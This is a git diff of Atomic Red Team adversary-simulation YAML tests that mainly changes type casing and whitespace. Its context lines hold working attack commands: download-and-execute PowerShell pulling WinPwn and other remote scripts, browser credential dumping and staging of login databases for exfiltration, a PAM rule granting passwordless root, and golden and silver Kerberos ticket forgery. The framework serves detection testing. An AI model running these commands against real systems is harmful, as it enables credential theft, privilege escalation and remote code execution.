c900bf4f..32757aac 100644 --- a/atomics/T1553.004/T1553.004.yaml +++ b/atomics/T1553.004/T1553.004.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: cert_filename: description: Path of the CA certificate we create - type: Path + type: path default: rootCA.crt key_filename: description: Key we create that is used to create the CA certificate - type: Path + type: path default: rootCA.key executor: command: | @@ -36,11 +36,11 @@ atomic_tests: input_arguments: cert_filename: description: CA file name - type: Path + type: path default: rootCA.crt key_filename: description: Key we create that is used to create the CA certificate - type: Path + type: path default: rootCA.key dependency_executor_name: sh dependencies: @@ -66,11 +66,11 @@ atomic_tests: input_arguments: cert_filename: description: CA file name - type: Path + type: path default: rootCA.crt key_filename: description: Key we create that is used to create the CA certificate - type: Path + type: path default: rootCA.key dependency_executor_name: sh dependencies: @@ -95,7 +95,7 @@ atomic_tests: input_arguments: pfx_path: description: Path of the certificate - type: Path + type: path default: rootCA.cer dependency_executor_name: powershell dependencies: @@ -129,7 +129,7 @@ atomic_tests: input_arguments: pfx_path: description: Path of the certificate - type: Path + type: path default: $env:Temp\rootCA2.cer dependency_executor_name: powershell dependencies: @@ -162,8 +162,8 @@ atomic_tests: - windows executor: command: | - IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) + IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) cleanup_command: | - Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item + Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml index aa5b5612..44c5ffc4 100644 --- a/atomics/T1553.005/T1553.005.yaml +++ b/atomics/T1553.005/T1553.005.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: path_of_iso: description: Path to ISO file - type: Path + type: path default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso dependency_executor_name: powershell dependencies: @@ -38,7 +38,7 @@ atomic_tests: input_arguments: path_of_iso: description: Path to ISO file - type: Path + type: path default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso dependency_executor_name: powershell dependencies: @@ -68,11 +68,11 @@ atomic_tests: input_arguments: file_to_download: description: File that will be downloaded to test against. - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/README.md file_path: description: File to have the Zone.Identifier removed. - type: String + type: string default: '$env:tmp\ReadMe.md' dependency_executor_name: powershell dependencies: @@ -97,7 +97,7 @@ atomic_tests: input_arguments: path_of_iso: description: Path to ISO file - type: Path + type: path default: PathToAtomicsFolder\T1553.005\bin\AllTheThings.iso dependency_executor_name: powershell dependencies: @@ -117,4 +117,4 @@ atomic_tests: $instance.Document.Application.ShellExecute($driveLetter+":\document.lnk","",$driveLetter+":\",$null,0) cleanup_command: | Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null - name: powershell \ No newline at end of file + name: powershell diff --git a/atomics/T1555.001/T1555.001.yaml b/atomics/T1555.001/T1555.001.yaml index 2e72abd8..749afa1a 100644 --- a/atomics/T1555.001/T1555.001.yaml +++ b/atomics/T1555.001/T1555.001.yaml @@ -20,7 +20,7 @@ atomic_tests: input_arguments: cert_export: description: Specify the path of the certificates to export. - type: Path + type: path default: /tmp/certs.pem executor: command: | diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index 547d3c31..3e22b4c3 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml @@ -14,7 +14,7 @@ atomic_tests: input_arguments: file_path: description: File path for modified Sysinternals - type: String + type: string default: $env:TEMP dependency_executor_name: powershell dependencies: @@ -45,7 +45,7 @@ atomic_tests: input_arguments: search_string: description: String to search Safari cookies to find. - type: String + type: string default: coinbase executor: command: | @@ -58,11 +58,11 @@ atomic_tests: The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system. LaZagne is an open source application used to retrieve passwords stored on a local computer. supported_platforms: - - windows + - windows input_arguments: lazagne_path: description: Path to LaZagne - type: Path + type: path default: PathToAtomicsFolder\T1555.003\bin\LaZagne.exe dependency_executor_name: powershell dependencies: @@ -83,13 +83,13 @@ atomic_tests: description: | Simulates an adversary accessing encrypted credentials from Google Chrome Login database. supported_platforms: - - windows + - windows dependency_executor_name: powershell dependencies: - description: | Chrome must be installed prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}' - get_prereq_command: | + get_prereq_command: | $installer = "$env:temp\ChromeStandaloneSetup64.msi" Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi msiexec /i $installer /qn @@ -108,13 +108,13 @@ atomic_tests: description: | Simulates an adversary accessing encrypted credentials from Opera web browser's login database. supported_platforms: - - windows + - windows dependency_executor_name: powershell dependencies: - description: | Opera must be installed - prereq_command: 'if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1}' - get_prereq_command: | + prereq_command: 'if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1}' + get_prereq_command: | $installer = "$env:temp\OperaStandaloneInstaller.exe" Invoke-WebRequest -OutFile $env:temp\OperaStandaloneInstaller.exe https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe Start-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0' @@ -122,8 +122,8 @@ atomic_tests: Stop-Process -Name "opera" - description: | Opera login data file must exist - prereq_command: 'if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1}' - get_prereq_command: | + prereq_command: 'if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1}' + get_prereq_command: | New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType File executor: name: powershell @@ -137,12 +137,12 @@ atomic_tests: Simulates an adversary accessing encrypted credentials from firefox web browser's login database. more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data supported_platforms: - - windows + - windows dependency_executor_name: powershell dependencies: - description: | Firefox must be installed - prereq_command: 'if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}' + prereq_command: 'if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}' get_prereq_command: | if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"} $installer = "$env:temp\firefoxsetup.exe" @@ -150,8 +150,8 @@ atomic_tests: Start-Process $installer -ArgumentList '/S' -Wait - description: | Firefox login data file must exist - prereq_command: 'if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1}' - get_prereq_command: | + prereq_command: 'if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1}' + get_prereq_command: | if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$firefox="C:\Program Files\Mozilla Firefox\firefox.exe"}else {$firefox="C:\Program Files (x86)\Mozilla Firefox\firefox.exe"} Start-Process $firefox -ArgumentList '-CreateProfile Atomic' -Wait Start-Process $firefox -NoNewWindow @@ -169,18 +169,18 @@ atomic_tests: Simulates an adversary accessing encrypted credentials from Edge web browser's login database. more info in https://www.forensicfocus.com/articles/chromium-based-microsoft-edge-from-a-forensic-point-of-view/ supported_platforms: - - windows + - windows dependency_executor_name: powershell dependencies: - description: | Edge must be installed - prereq_command: 'if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") {exit 0} else {exit 1}' + prereq_command: 'if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") {exit 0} else {exit 1}' get_prereq_command: | "Installation is not implemented as Edge is a part of windows" - description: | Edge login data file must exist - prereq_command: 'if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default") {exit 0} else {exit 1}' - get_prereq_command: | + prereq_command: 'if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default") {exit 0} else {exit 1}' + get_prereq_command: | $edge="C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" Start-Process $edge Start-Sleep -s 20 @@ -197,23 +197,23 @@ atomic_tests: Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords. Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. supported_platforms: - - windows + - windows input_arguments: Firepwd_Path: description: Filepath for Firepwd.py - type: String + type: string default: $env:temp\Firepwd.py Out_Filepath: description: Filepath to output results to - type: String + type: string default: $env:temp\T1555.003Test8.txt VS_CMD_Path: description: Filepath to Visual Studio Build Tools Command prompt - type: String + type: string default: C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat Python_Path: description: Filepath to python - type: String + type: string default: C:\Program Files\Python310\python.exe dependency_executor_name: powershell dependencies: @@ -277,11 +277,11 @@ atomic_tests: executor: name: powershell command: | - $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" - cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} - cat #{Out_Filepath} + $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" + cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} + cat #{Out_Filepath} cleanup_command: | - Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue + Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue - name: LaZagne.py - Dump Credentials from Firefox Browser auto_generated_guid: 87e88698-621b-4c45-8a89-4eaebdeaabb1 description: Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser, Reference https://github.com/AlessandroZ/LaZagne @@ -290,7 +290,7 @@ atomic_tests: input_arguments: lazagne_path: description: Path you put LaZagne Github with LaZagne.py - type: String + type: string default: /tmp/LaZagne/Linux specific_module: description: You may change the module to "all" for all password that can be found by LaZagne.py @@ -298,7 +298,7 @@ atomic_tests: default: 'browsers -firefox' output_file: description: This is where output for the Firefox passwords goes - type: String + type: string default: /tmp/firefox_password.txt dependency_executor_name: sh dependencies: @@ -319,23 +319,23 @@ atomic_tests: This test is designed to search a drive for credential files used by the most common web browsers on Windows (Firefox, Chrome, Opera, and Edge), export the found files to a folder, and zip it, simulating how an adversary might stage sensitive credential files for exfiltration in order to conduct offline password extraction with tools like [firepwd.py](https://github.com/lclevy/firepwd) or [HackBrowserData](https://github.com/moonD4rk/HackBrowserData). supported_platforms: - - windows + - windows executor: - name: powershell + name: powershell command: | - $exfil_folder = "$env:temp\T1555.003" - if (test-path "$exfil_folder") {} else {new-item -path "$env:temp" -Name "T1555.003" -ItemType "directory" -force} - $FirefoxCredsLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" - if (test-path "$FirefoxCredsLocation\key4.db") {copy-item "$FirefoxCredsLocation\key4.db" -destination "$exfil_folder\T1555.003Firefox_key4.db"} else {} - if (test-path "$FirefoxCredsLocation\logins.json") {copy-item "$FirefoxCredsLocation\logins.json" -destination "$exfil_folder\T1555.003Firefox_logins.json"} else {} - if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -destination "$exfil_folder\T1555.003Chrome_Login Data"} else {} - if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account" -destination "$exfil_folder\T1555.003Chrome_Login Data For Account"} else {} - if (test-path "$env:appdata\Opera Software\Opera Stable\Login Data") {copy-item "$env:appdata\Opera Software\Opera Stable\Login Data" -destination "$exfil_folder\T1555.003Opera_Login Data"} else {} - if (test-path "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data") {copy-item "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data" -destination "$exfil_folder\T1555.003Edge_Login Data"} else {} - compress-archive -path "$exfil_folder" -destinationpath "$exfil_folder.zip" -force + $exfil_folder = "$env:temp\T1555.003" + if (test-path "$exfil_folder") {} else {new-item -path "$env:temp" -Name "T1555.003" -ItemType "directory" -force} + $FirefoxCredsLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" + if (test-path "$FirefoxCredsLocation\key4.db") {copy-item "$FirefoxCredsLocation\key4.db" -destination "$exfil_folder\T1555.003Firefox_key4.db"} else {} + if (test-path "$FirefoxCredsLocation\logins.json") {copy-item "$FirefoxCredsLocation\logins.json" -destination "$exfil_folder\T1555.003Firefox_logins.json"} else {} + if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -destination "$exfil_folder\T1555.003Chrome_Login Data"} else {} + if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account" -destination "$exfil_folder\T1555.003Chrome_Login Data For Account"} else {} + if (test-path "$env:appdata\Opera Software\Opera Stable\Login Data") {copy-item "$env:appdata\Opera Software\Opera Stable\Login Data" -destination "$exfil_folder\T1555.003Opera_Login Data"} else {} + if (test-path "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data") {copy-item "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data" -destination "$exfil_folder\T1555.003Edge_Login Data"} else {} + compress-archive -path "$exfil_folder" -destinationpath "$exfil_folder.zip" -force cleanup_command: | - Remove-Item -Path "$env:temp\T1555.003.zip" -force -erroraction silentlycontinue - Remove-Item -Path "$env:temp\T1555.003\" -force -recurse -erroraction silentlycontinue + Remove-Item -Path "$env:temp\T1555.003.zip" -force -erroraction silentlycontinue + Remove-Item -Path "$env:temp\T1555.003\" -force -recurse -erroraction silentlycontinue - name: WinPwn - BrowserPwn auto_generated_guid: 764ea176-fb71-494c-90ea-72e9d85dce76 description: Collect Browser credentials as well as the history via winpwn browserpwn function of WinPwn. @@ -360,7 +360,7 @@ atomic_tests: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') kittenz -consoleoutput -noninteractive name: powershell -- name: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials +- name: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials auto_generated_guid: e5e3d639-6ea8-4408-9ecd-d5a286268ca0 description: PowerSharpPack - Sharpweb searching for Browser Credentials technique via function of WinPwn supported_platforms: @@ -395,7 +395,7 @@ atomic_tests: input_arguments: webbrowserpassview_path: description: 'Path to the WebBrowserPassView executable ' - type: String + type: string default: PathToAtomicsFolder\T1555.003\bin\WebBrowserPassView.exe dependency_executor_name: powershell dependencies: @@ -411,7 +411,7 @@ atomic_tests: Start-Sleep -Second 4 Stop-Process -Name "WebBrowserPassView" name: powershell - elevation_required: true + elevation_required: true - name: BrowserStealer (Chrome / Firefox / Microsoft Edge) auto_generated_guid: 6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd description: | diff --git a/atomics/T1556.002/T1556.002.yaml b/atomics/T1556.002/T1556.002.yaml index 3e100865..7c18d57b 100644 --- a/atomics/T1556.002/T1556.002.yaml +++ b/atomics/T1556.002/T1556.002.yaml @@ -14,11 +14,11 @@ atomic_tests: input_arguments: dll_path: description: Path to DLL to be installed and registered - type: Path + type: path default: PathToAtomicsFolder\T1556.002\bin dll_name: description: Name of the Password Filter - type: String + type: string default: AtomicRedTeamPWFilter.dll dependency_executor_name: powershell dependencies: @@ -41,4 +41,4 @@ atomic_tests: reg.exe import PathToAtomicsFolder\T1556.002\lsa_backup.reg remove-item C:\Windows\System32\#{dll_name} name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1556.003/T1556.003.yaml b/atomics/T1556.003/T1556.003.yaml index eb9f989b..19dcfc37 100644 --- a/atomics/T1556.003/T1556.003.yaml +++ b/atomics/T1556.003/T1556.003.yaml @@ -5,22 +5,22 @@ atomic_tests: auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c description: | Inserts a rule into a PAM config and then tests it. - + Upon successful execution, this test will insert a rule that allows every user to su to root without a password. supported_platforms: - linux input_arguments: path_to_pam_conf: description: PAM config file to modify. - type: String + type: string default: /etc/pam.d/su-l pam_rule: description: Rule to add to the PAM config. - type: String + type: string default: auth sufficient pam_succeed_if.so uid >= 0 index: description: Index where the rule is inserted. - type: Integer + type: integer default: 1 executor: name: sh @@ -40,23 +40,23 @@ atomic_tests: input_arguments: path_to_pam_conf: description: PAM config file to modify. - type: String + type: string default: /etc/pam.d/su-l pam_rule: description: Rule to add to the PAM config. - type: String + type: string default: auth sufficient /tmp/pam_evil.so index: description: Index where the rule is inserted. - type: Integer + type: integer default: 1 path_to_pam_module_source: description: Path to PAM module source code. - type: Path + type: path default: PathToAtomicsFolder/T1556.003/src/pam_evil.c path_to_pam_module: description: Path to PAM module object - type: Path + type: path default: /tmp/pam_evil.so dependencies: - description: | diff --git a/atomics/T1558.001/T1558.001.yaml b/atomics/T1558.001/T1558.001.yaml index a6e85c1d..3740e47f 100644 --- a/atomics/T1558.001/T1558.001.yaml +++ b/atomics/T1558.001/T1558.001.yaml @@ -8,27 +8,27 @@ atomic_tests: This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. supported_platforms: - - windows + - windows input_arguments: domain_sid: description: SID of the targeted domain, if you keep default it will automatically get the current domain SID - type: String + type: string default: S-1-5-21-DEFAULT domain: description: Targeted Active Directory domain FQDN - type: String + type: string default: '%userdnsdomain%' account: description: Account to impersonate - type: String + type: string default: goldenticketfakeuser krbtgt_aes256_key: description: Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain) - type: String + type: string default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 mimikatz_path: description: Mimikatz windows executable - type: Path + type: path default: '$env:TEMP\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: @@ -82,10 +82,10 @@ atomic_tests: echo End of Golden Ticket attack ) "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat - + # run batch file in a new empty session (password and username do not matter) echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null - + # wait until the output file has logged the entire attack do { Start-Sleep 1 # wait a bit so the output file has time to be created @@ -108,31 +108,31 @@ atomic_tests: This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. supported_platforms: - - windows + - windows input_arguments: domaincontroller: description: Targeted Active Directory domain FQDN - type: String - default: $ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain" + type: string + default: $ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain" account: description: Account to impersonate - type: String + type: string default: $ENV:username krbtgt_aes256_key: description: Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain) - type: String + type: string default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 local_folder: description: Local path of Rubeus executable - type: Path + type: path default: $Env:temp local_executable: description: name of the rubeus executable - type: String + type: string default: 'rubeus.exe' rubeus_url: description: URL of Rubeus executable - type: Url + type: url default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe dependency_executor_name: powershell dependencies: @@ -151,13 +151,13 @@ atomic_tests: executor: name: powershell elevation_required: false - command: | + command: | Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore - + cmd.exe /c "#{local_folder}\#{local_executable}" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden $filename = (Get-ChildItem | ? {$_.Name.startswith("golden_")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name - + # create batch file with commands to run in a separate "runas /netonly" session # so we don't purge Kerberos ticket from the current Windows session # its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise @@ -180,10 +180,10 @@ atomic_tests: echo End of Golden Ticket attack ) "@ -Replace "kirbifile", $filename | Out-File -Encoding OEM $env:TEMP\golden.bat - + # run batch file in a new empty session (password and username do not matter) echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null - + # wait until the output file has logged the entire attack do { Start-Sleep 1 # wait a bit so the output file has time to be created diff --git a/atomics/T1558.002/T1558.002.yaml b/atomics/T1558.002/T1558.002.yaml index b36224d0..a552f63d 100644 --- a/atomics/T1558.002/T1558.002.yaml +++ b/atomics/T1558.002/T1558.002.yaml @@ -7,31 +7,31 @@ atomic_tests: Once the hash of service account is retrieved it is possible to forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. supported_platforms: - - windows + - windows input_arguments: domain_sid: description: SID of the targeted domain, if you keep default it will automatically get the current domain SID - type: String + type: string default: S-1-5-21-DEFAULT domain: description: Targeted Active Directory domain FQDN - type: String + type: string default: '%userdnsdomain%' account: description: Account to impersonate - type: String + type: string default: silverticketfakeuser target: description: System you want to target (Default will be logon server) - type: String + type: string default: '%logonserver:\\=%' service_aes256_key: description: AES256 key (you will need to set to match your service key for your target) - type: String + type: string default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 mimikatz_path: description: Mimikatz windows executable - type: Path + type: path default: '$env:TEMP\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: @@ -85,10 +85,10 @@ atomic_tests: echo End of Silver Ticket attack ) "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\silver.bat - + # run batch file in a new empty session (password and username do not matter) echo "foo" | runas /netonly /user:fake "$env:TEMP\silver.bat" | Out-Null - + # wait until the output file has logged the entire attack do { Start-Sleep 1 # wait a bit so the output file has time to be created diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml index 6e12879a..3b9f1777 100644 --- a/atomics/T1558.003/T1558.003.yaml +++ b/atomics/T1558.003/T1558.003.yaml @@ -36,24 +36,24 @@ atomic_tests: input_arguments: local_folder: description: Local path of Rubeus executable - type: Path + type: path default: $Env:temp local_executable: description: name of the rubeus executable - type: String + type: string default: 'rubeus.exe' out_file: description: file where command results are stored - type: String + type: string default: rubeus_output.txt rubeus_url: description: URL of Rubeus executable - type: Url + type: url default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe flags: description: command flags you would like to run (optional and blank by default) - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | @@ -87,7 +87,7 @@ atomic_tests: input_arguments: domain_name: description: The Domain Name to lookup against - type: String + type: string default: "%USERDNSDOMAIN%" dependency_executor_name: powershell dependencies: @@ -134,7 +134,7 @@ atomic_tests: input_arguments: domain_name: description: The Domain Name to lookup against - type: String + type: string default: "%USERDNSDOMAIN%" dependency_executor_name: powershell dependencies: diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml index 5ab89c58..6d8c2cad 100644 --- a/atomics/T1558.004/T1558.004.yaml +++ b/atomics/T1558.004/T1558.004.yaml @@ -11,19 +11,19 @@ atomic_tests: input_arguments: local_folder: description: Local path of Rubeus executable - type: Path + type: path default: $Env:temp local_executable: description: name of the rubeus executable - type: String + type: string default: 'rubeus.exe' out_file: description: file where command results are stored - type: String + type: string default: rubeus_output.txt rubeus_url: description: URL of Rubeus executable - type: Url + type: url default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe dependency_executor_name: powershell dependencies: diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index 41f1ab69..23c6502e 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml @@ -7,37 +7,37 @@ atomic_tests: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory supported_platforms: - - windows + - windows input_arguments: input_path: description: Path that should be compressed into our output file - type: Path + type: path default: '%USERPROFILE%' file_extension: description: Extension of files to compress - type: String + type: string default: ".txt" output_file: description: Path where resulting compressed data should be placed - type: Path + type: path default: '%USERPROFILE%\T1560.001-data.rar' rar_installer: description: Winrar installer - type: Path + type: path default: '%TEMP%\winrar.exe' rar_exe: description: The RAR executable from Winrar - type: Path + type: path default: '%programfiles%/WinRAR/Rar.exe' dependencies: - - description: | - Rar tool must be installed at specified location (#{rar_exe}) - prereq_command: | - if not exist "#{rar_exe}" (exit /b 1) - get_prereq_command: | - echo Downloading Winrar installer - bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} - #{rar_installer} /S + - description: | + Rar tool must be installed at specified location (#{rar_exe}) + prereq_command: | + if not exist "#{rar_exe}" (exit /b 1) + get_prereq_command: | + echo Downloading Winrar installer + bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} + #{rar_installer} /S executor: name: command_prompt elevation_required: false @@ -51,15 +51,15 @@ atomic_tests: Note: Requires winrar installation rar a -p"blue" hello.rar (VARIANT) supported_platforms: - - windows + - windows input_arguments: rar_installer: description: Winrar installer - type: Path + type: path default: '%TEMP%\winrar.exe' rar_exe: description: The RAR executable from Winrar - type: Path + type: path default: '%programfiles%/WinRAR/Rar.exe' dependencies: - description: | @@ -85,32 +85,32 @@ atomic_tests: Note: Requires winzip installation wzzip sample.zip -s"blueblue" *.txt (VARIANT) supported_platforms: - - windows + - windows input_arguments: winzip_exe: description: Path to installed Winzip executable - type: Path + type: path default: "%ProgramFiles%\\WinZip\\winzip64.exe" winzip_url: description: Path to download Windows Credential Editor zip file - type: Url + type: url default: https://download.winzip.com/gl/nkln/winzip24-home.exe winzip_hash: description: File hash of the Windows Credential Editor zip file - type: String + type: string default: B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB dependency_executor_name: powershell dependencies: - - description: | - Winzip must be installed - prereq_command: | - cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' - get_prereq_command: | - IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) - if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ - Write-Host Follow the installation prompts to continue - cmd /c "$env:Temp\winzip.exe" - } + - description: | + Winzip must be installed + prereq_command: | + cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' + get_prereq_command: | + IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) + if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ + Write-Host Follow the installation prompts to continue + cmd /c "$env:Temp\winzip.exe" + } executor: name: command_prompt elevation_required: false @@ -126,15 +126,15 @@ atomic_tests: description: | Note: Requires 7zip installation supported_platforms: - - windows + - windows input_arguments: 7zip_installer: description: 7zip installer - type: Path - default: "%TEMP%\\7zip.exe" + type: path + default: "%TEMP%\\7zip.exe" 7zip_exe: description: Path to installed 7zip executable - type: Path + type: path default: "%ProgramFiles%\\7-zip\\7z.exe" dependencies: - description: | @@ -159,25 +159,25 @@ atomic_tests: description: | An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. supported_platforms: - - linux - - macos + - linux + - macos input_arguments: input_files: description: Path that should be compressed into our output file, may include wildcards - type: Path + type: path default: /var/log/{w,b}tmp output_file: description: Path that should be output as a zip archive - type: Path + type: path default: $HOME/data.zip dependencies: - - description: | - Files to zip must exist (#{input_files}) - prereq_command: | - if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi; - get_prereq_command: | - (which yum && yum -y install epel-release zip)||(which apt-get 